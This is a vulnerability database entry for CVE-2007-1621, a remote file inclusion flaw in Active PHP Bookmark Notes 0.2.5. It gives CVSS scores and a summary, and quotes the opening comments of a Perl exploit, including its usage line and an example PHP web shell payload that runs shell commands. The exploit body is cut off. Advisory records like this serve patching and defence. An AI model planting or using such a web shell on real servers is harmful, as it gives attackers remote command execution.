10
CVSSv2

CVE-2007-1621

Published: 23/03/2007 Updated: 11/10/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

PHP remote file inclusion vulnerability in templates/head.php in Active PHP Bookmark Notes (APB) 0.2.5 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the APB_SETTINGS[template_path] parameter. NOTE: this issue might be related to CVE-2003-1254.

Vulnerable Product Search on Vulmon Subscribe to Product

lbstone active php bookmark notes

Exploits

#!/usr/bin/perl # Active PHP Bookmark Notes 025 <= Remote File Inclusion Exploit # Download S: sourceforgenet/projects/apbn/ # Discovered & Coded by: GloD_M = [Mahmood_ali] # perl GloDpl <target> <cmd shell location> <cmd shell variable> # cmd shell example: <?passthru($_GET[cmd]);?> # Ex: # localho ...